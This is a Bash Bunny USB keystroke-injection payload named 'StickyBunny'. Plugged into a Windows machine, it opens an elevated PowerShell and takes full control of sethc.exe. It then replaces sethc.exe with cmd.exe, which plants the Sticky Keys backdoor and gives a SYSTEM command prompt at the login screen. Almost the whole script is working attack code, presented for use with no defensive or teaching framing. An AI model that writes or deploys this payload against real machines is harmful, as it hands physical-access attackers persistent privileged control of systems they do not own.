#!/bin/bash
#
# Title:         StickyBunny
# Author:        Squibs
# Version:       0.3
# Plug2Pwn:		 18s
#
# Creates the sticky keys back door on a windows machine
#
# Blue...............Preparing Attack
# Yellow.............Attacking
# Green..............GTFO

#Open Admin Powershell 
ATTACKMODE HID
LED B 200
Q GUI
Q DELAY 500
Q STRING POWERSHELL
Q DELAY 1000
Q CTRL-SHIFT ENTER
Q DELAY 2000
Q LEFTARROW
Q DELAY 100
Q ENTER
Q DELAY 1200

#Give Permissions for sethc.exe to current user
LED Y 500 
Q STRING "\$Acl = Get-Acl sethc.exe"
Q ENTER
Q DELAY 100
Q STRING "\$Ar = New-Object  system.security.accesscontrol.filesystemaccessrule(\$env:UserName,\"FullControl\",\"Allow\")"
Q ENTER
Q DELAY 100
Q STRING "\$Acl.SetAccessRule(\$Ar)"
Q ENTER
Q DELAY 100
Q STRING "Set-Acl sethc.exe \$Acl"
Q ENTER
Q DELAY 100

#Copy over CMD to SETHC.EXE (Save sethc.exe as sethc.exe.bak if you want to be nice)
Q STRING "xcopy sethc.exe sethc.exe.bak"
Q ENTER 
Q DELAY 1200
Q STRING "F"
Q DELAY 100
Q STRING "xcopy cmd.exe sethc.exe"
Q ENTER
Q DELAY 200
Q STRING "Y"
Q ENTER
Q DELAY 200

# GTFO
Q STRING EXIT
Q ENTER

#Sync Drive
sync

#Trap is clean!
LED G